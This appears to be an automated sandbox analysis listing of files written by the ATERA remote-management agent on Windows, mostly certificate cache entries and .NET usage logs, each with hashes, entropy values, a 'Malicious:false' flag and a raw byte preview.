                                                                                                                                                                                                                                                                                              SHA1:64B2F1B1A66E45FF79655E2CF007068E58DEDA19
                                                                                                                                                                                                                                                                                              SHA-256:0F6D822546A0A7B6DBB98817D454CCE45E65859ECE9B5851F8E51DF7EE91FFF0
                                                                                                                                                                                                                                                                                              SHA-512:A095944F38F285A408FD58539102AEC0325A428513C84C4DF793137F532B364CDCD1A8EFC79B1669846882EC5744D711309EF62705834E900F79EE507A4CE255
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:0..........0.....+.....0......0...0..........q]dL..g?....O..20250105184215Z0s0q0I0...+........."..;F..=\@ua..........q]dL..g?....O....@.`.L.^........20250105184215Z....20250112184215Z0...*.H..............c]u...kZ.HF`.H`..=fV.,.....sz...q..S....J.......*..%.....#`e..2.O.v.C".....2\.-.>......7(..{\.........-V[.....\..._Jg>...Q......H*..B..`..h...;.oK..I..;2.a.....}....0..|....kx.:...B<.~..M..&f>?z.l.|.e.W...v\4.8..,.....N.u...A.+s..p......A........8.../...>...P&.0...i...on.gW. \pY0?..~/6...:.k..~M.5E&"?..x.sQi.v..q.c.#;....D...k.o.^......8.._.l2..H.*.....=....y. .e.b&=.!.n...<.L....*.3:.hI+k%3.....d........p.....r.ac.4(..S...M..;..Z=@.~....i..X.f.z...S...Bs...L..^....`1..[.a.d.t...X...qb.._.=

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:Certificate, Version=3
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1428
                                                                                                                                                                                                                                                                                              Entropy (8bit):7.688784034406474
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:nIGWnSIGWnSGc9VIyy0KuiUQ+7n0TCDZJCCAyuIqwmCFUZnPQ1LSdT:nIL7LJSRQ+QgAyuxwfynPQmR
                                                                                                                                                                                                                                                                                              MD5:78F2FCAA601F2FB4EBC937BA532E7549
                                                                                                                                                                                                                                                                                              SHA1:DDFB16CD4931C973A2037D3FC83A4D7D775D05E4
                                                                                                                                                                                                                                                                                              SHA-256:552F7BDCF1A7AF9E6CE672017F4F12ABF77240C78E761AC203D1D9D20AC89988
                                                                                                                                                                                                                                                                                              SHA-512:BCAD73A7A5AFB7120549DD54BA1F15C551AE24C7181F008392065D1ED006E6FA4FA5A60538D52461B15A12F5292049E929CFFDE15CC400DEC9CDFCA0B36A68DD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:0...0..x..........W..!2.9...wu\0...*.H........0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40...130801120000Z..380115120000Z0b1.0...U....US1.0...U....DigiCert Inc1.0...U....www.digicert.com1!0...U....DigiCert Trusted Root G40.."0...*.H.............0..........sh..]J<0"0i3..%..!=..Y..).=X.v..{....0....8..V.m...y....._..<R.R....~...W.YUr.h.p..u.js2...D.......t;mq.-... .. .c)-..^N..!a.4...^.[......4@_.zf.w.H.fWW.TX..+.O.0.V..{]..O^.5.1..^......@.y.x...j.8.....7...}...>..p.U.A2...s*n..|!L....u]xf.:1D.3@...ZI...g.'..O9..X..$\F.d..i.v.v=Y]Bv...izH....f.t..K...c....:.=...E%...D.+~....am.3...K...}....!........p,A`..c.D..vb~.....d.3....C....w.....!..T)%.l..RQGt.&..Au.z._.?..A..[..P.1..r."..|Lu?c.!_. Qko....O..E_. ........~.&...i/..-............B0@0...U.......0....0...U...........0...U..........q]dL..g?....O0...*.H..............a.}.l.........dh.V.w.p...J...x\.._...)V.6I]Dc...f.#.=y.mk.T..<.C@..P.R..;...ik.

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):340
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.2358639219875163
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKNOq5+7DNfUN+SkQlPlEGYRMY9z+s3Ql2DUeXJlOW1:SLkPlE99SCQl2DUeXJlOA
                                                                                                                                                                                                                                                                                              MD5:C707136EF75223EB94D8FE9358A57D1C
                                                                                                                                                                                                                                                                                              SHA1:B4ACCB9DC2E04E5613E0C1E1B939CD9EC8BB299B
                                                                                                                                                                                                                                                                                              SHA-256:2FC8D8C9C7C3E08CE57521B932F7812B25793F906A3C46B507EC3C628C795954
                                                                                                                                                                                                                                                                                              SHA-512:89D53FE6405AF3180CD0431BF89AFEC3F4B66B75CF178F63B9721DA071A1332ED5CA187FEE2FFCE6DDC05893F813C83E5159DB374FA8B28444FC90AA1B3F7A27
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ...........?2`..(....................................................... ........~..MG......&.....6.........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.d.i.s.a.l.l.o.w.e.d.c.e.r.t.s.t.l...c.a.b...".0.6.c.f.c.c.5.4.d.4.7.d.b.1.:.0."...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):400
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9133984983872927
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKEQAtp+HlXlRNfOAUMivhClroFzCJCgO3lwuqDnlyQ4hY5isIlQhZgJn:c8TmxMiv8sFzD3quqDkPh8Y2ZM
                                                                                                                                                                                                                                                                                              MD5:E09770EF3274501233D0BBF13E23205D
                                                                                                                                                                                                                                                                                              SHA1:CEA675EFA94B64E7B4A79A7645F3520EE334C548
                                                                                                                                                                                                                                                                                              SHA-256:1D05934490C370DF32CADC80E954BF9D1947FCA38D59655F4B96D7438390C473
                                                                                                                                                                                                                                                                                              SHA-512:7A0E6D20B5C4F6D86277F3BBEC19A839A53CD2127D1A79A9EEC5A3217D22BD282425934B197B593B2AF421FFFA16828925909D1EAB73AC2A832C34F0C1D2E789
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ...........Q2`..(.................N.._....2.$e....................2.$e.. ........s.52`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.3.x.L.4.L.Q.L.X.D.R.D.M.9.P.6.6.5.T.W.4.4.2.v.r.s.U.Q.Q.U.R.e.u.i.r.%.2.F.S.S.y.4.I.x.L.V.G.L.p.6.c.h.n.f.N.t.y.A.8.C.E.A.6.b.G.I.7.5.0.C.3.n.7.9.t.Q.4.g.h.A.G.F.o.%.3.D...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):404
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9295396142652272
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kK3+fgJaXjzZD/yfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhl+Ksc8:2fgJGKmxMiv8sF3HtllJZIvOP205scn8
                                                                                                                                                                                                                                                                                              MD5:CC904F9E73B8BEBB3DA97EB5FDE6154F
                                                                                                                                                                                                                                                                                              SHA1:B373C07D002B0C198240B18B9EEE24DE9D557BC7
                                                                                                                                                                                                                                                                                              SHA-256:8CC0EE73E8EA732E82990B2E162DBC6AEC06A6B2B89503032FA71ED6809F8D9F
                                                                                                                                                                                                                                                                                              SHA-512:5F6421C624F5B0CD527F924CCF9F575B5743A6C2FFEA2F79B7E2246932252BB4E62BC51FACDA76F727755D9071488135C4CC373A18CAE4234B7DEFB0BB11CF76
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... .... .......>`..(...................._....../e....................../e.. ........L..,`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.o.o.S.Z.l.4.5.Y.m.N.9.A.o.j.j.r.i.l.U.u.g.%.3.D...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):308
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.1920722816696916
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKm3zNcalgRAOAUSW0P3PeXJUwh8lmi3Y:uCtWOxSW0P3PeXJUZY
                                                                                                                                                                                                                                                                                              MD5:EC9B5D114AAFD5EE986411029DA6C837
                                                                                                                                                                                                                                                                                              SHA1:38FC0C29651AFAD36D3A7B91E8B92A502BCCFF3A
                                                                                                                                                                                                                                                                                              SHA-256:63B6F4DB901A72545309E87A66198B973BECB3484DD86A985A36F4650AD421A1
                                                                                                                                                                                                                                                                                              SHA-512:922EE5C9A5C40D3BB9F9C422AEB7553C943A38D6779B3FBBACDF5AFE194D5F1272359B412E5F4DB83958B22040359670490DF7AE0D345A91325B91EC3677F64F
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ..........-/>`..(....................................................... ........}.-@@......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.G.4.C.o.d.e.S.i.g.n.i.n.g.R.S.A.4.0.9.6.S.H.A.3.8.4.2.0.2.1.C.A.1...c.r.t...".6.0.9.0.3.0.2.2.-.6.b.4."...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):412
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.9928968587762745
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKjMSrXvI/bFhyfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:v0ZUmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                                              MD5:4C3D74B31764340EFFDBAD0DA6ADA1E5
                                                                                                                                                                                                                                                                                              SHA1:C29D9A81FCC6C44804F67DDC1E5D161AA2D97C76
                                                                                                                                                                                                                                                                                              SHA-256:8C28AF563F4C99DAB2636866DCDDF722C02755BF3150E8B02C9513850371659F
                                                                                                                                                                                                                                                                                              SHA-512:5C1D02283A36B62A7A4400F717E312A64EF46FEC3220BA042AE777712D47C4892A7E012144058F321FE8FBE971BBDD803E2541173A3509861FCEACB169892C02
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ....(....[.c2`..(.................*.._......!e......................!e.. ..........(2`.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):254
                                                                                                                                                                                                                                                                                              Entropy (8bit):3.05289886697123
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:6:kKxMpLDcJgjcalgRAOAUSW0PTKDXMOXISKlUp:J4LYS4tWOxSW0PAMsZp
                                                                                                                                                                                                                                                                                              MD5:947B0284C381D8A6FCF95CC1B1FBFE67
                                                                                                                                                                                                                                                                                              SHA1:831905E6FA1D499248CE637444B4EE9DB4ADF61D
                                                                                                                                                                                                                                                                                              SHA-256:3F3A6FA31E8813BDFE22A4F0513BE562DBC5B5B81551372B3F27CC17DA75845C
                                                                                                                                                                                                                                                                                              SHA-512:D23BCCAA3ECD70F92B4A3F9C41B4BD9629D34B881B56DB8A591710C2CFC7AF93AD687107E2069875995DC987A1F97BADB308810ECDC477AFC60F406F0E5B38DD
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:p...... ....l......I>`..(....................................................... ............n......................h.t.t.p.:././.c.a.c.e.r.t.s...d.i.g.i.c.e.r.t...c.o.m./.D.i.g.i.C.e.r.t.T.r.u.s.t.e.d.R.o.o.t.G.4...c.r.t...".5.a.2.8.6.4.1.7.-.5.9.4."...

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1944
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.343420056309075
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQg8mHDp684YHKGSI6oPtHTHhAHKKkhHNpaHKlT44HKmHKe60:iqzCYqGSI6oPtzHeqKkhtpaqZ44qmq10
                                                                                                                                                                                                                                                                                              MD5:437E4DCFC04CB727093C5232EA15F856
                                                                                                                                                                                                                                                                                              SHA1:81B949390201F3B70AE2375518A0FFD329310837
                                                                                                                                                                                                                                                                                              SHA-256:5EADB9774A50B6AD20D588FDA58F5A42B2E257A0AA26832B41F8EA008C1EB96B
                                                                                                                                                                                                                                                                                              SHA-512:0332C7E5205CF9221172473A841284487ACC111780A58557231FCDE72A5EDB7E7E3EF6C87AB9682A688BC24992A74027F930267B541039BD8757EEF4E2F51A0E
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.ServiceProcess, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Serv759bfb78#\e2ca4e2ddffdc0d0bda3f2ca65249790\System.ServiceProcess.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1983
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.345248756179348
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKksHVsHT6HNHOHKCHKlT40HKe60:iqbYqGSI6oPtzHeqKks1sz6tuqCqZ40T
                                                                                                                                                                                                                                                                                              MD5:F974F0FCD981AC0581C5498C0155EF91
                                                                                                                                                                                                                                                                                              SHA1:0CF6D5F41937B296EF9D37FC90E56EC8458B96DF
                                                                                                                                                                                                                                                                                              SHA-256:500B63AEC50B89EF4CEC9ED49E53D168CDC35D235CB416B84234D3E45F3AC365
                                                                                                                                                                                                                                                                                              SHA-512:1484917CC2A8E88DD4010FEE60394BD974D5C44ED0482DAD64B06A319E1F7E414321B8BDB06C6DE70152CFEA887BBDEFD2F2689C077251E8D2BBC9448FBF8719
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Runtime\2702

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:modified
                                                                                                                                                                                                                                                                                              Size (bytes):3043
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.361093730986187
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk9HVsHUHhHKe6PfHKWA1eXrHKlT4d6HNHGHPmHKm:iqbYqGSI6oPtzHeqKk91s0Bq13qhA7qp
                                                                                                                                                                                                                                                                                              MD5:7FBB3BC293626F02EEE5D12A2FC44FE7
                                                                                                                                                                                                                                                                                              SHA1:A736DE9B60CEC25864AE995EF046F3F317B5D1AC
                                                                                                                                                                                                                                                                                              SHA-256:B6ED7FB8E1D3A5AB9858099700CDA16766D6F442587CD6F965815CF8AFC1444D
                                                                                                                                                                                                                                                                                              SHA-512:C175AF1525508EEA8DEAE8BE67E4780922492B3D01ACDB36B43220DE5B57898F10558F80C5D6218B61A236D35C41047527C6AD00770F477E23507AAEA7EF2000
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Net.Http\f4

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):2281
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.369081487433356
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKk+HKlT44HKmHKe6+JHxLHqHvHltOoHKkHK/:iqbYqGSI6oPtzHeqKk+qZ44qmq1IRLKC
                                                                                                                                                                                                                                                                                              MD5:531A6F5E28B9249E42480323376AFFAA
                                                                                                                                                                                                                                                                                              SHA1:F812EDC75EB6895946F1DEE24EDEFFA60F8EF190
                                                                                                                                                                                                                                                                                              SHA-256:80BA3C0CDB6BDC36347B1CE852FD6E3CA4A6B3C92C204A7D974689604A662C28
                                                                                                                                                                                                                                                                                              SHA-512:1476EE8202DBE0BABE0001318CF368028E2F103CAF8D77F4B526ADD0EEB314F7E8B68AECD25EBADDEF7A67632865DCDF2AB3C5C3C08AA245780895BBF5F60BF7
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Runtime.Serialization, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\Syste

                                                                                                                                                                                                                                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe
                                                                                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1716
                                                                                                                                                                                                                                                                                              Entropy (8bit):5.341926971773382
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:MxHKQwYHKGSI6oPtHTHhAHKKkWHKCHKlT40HKe60HNpv:iqbYqGSI6oPtzHeqKkWqCqZ40q10tpv
                                                                                                                                                                                                                                                                                              MD5:063D709F01B78478C26522681AF5097D
                                                                                                                                                                                                                                                                                              SHA1:A6B4619D729EE3FA6206B74DB2699DD676470E20
                                                                                                                                                                                                                                                                                              SHA-256:C5E8941B824143B5F0477345582F8495B4EECF7901145EA6085FB36B57B64D39
                                                                                                                                                                                                                                                                                              SHA-512:C6C15C1655E42EEE66F0B5397E25691EE836B0095FDD3C5D202DF06855AFED2FE57CFA094DEE9C5327CDC27A8AEFD532A50638B2DEDA9A3B57B6EBE6AC3EB847
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Reputation:unknown
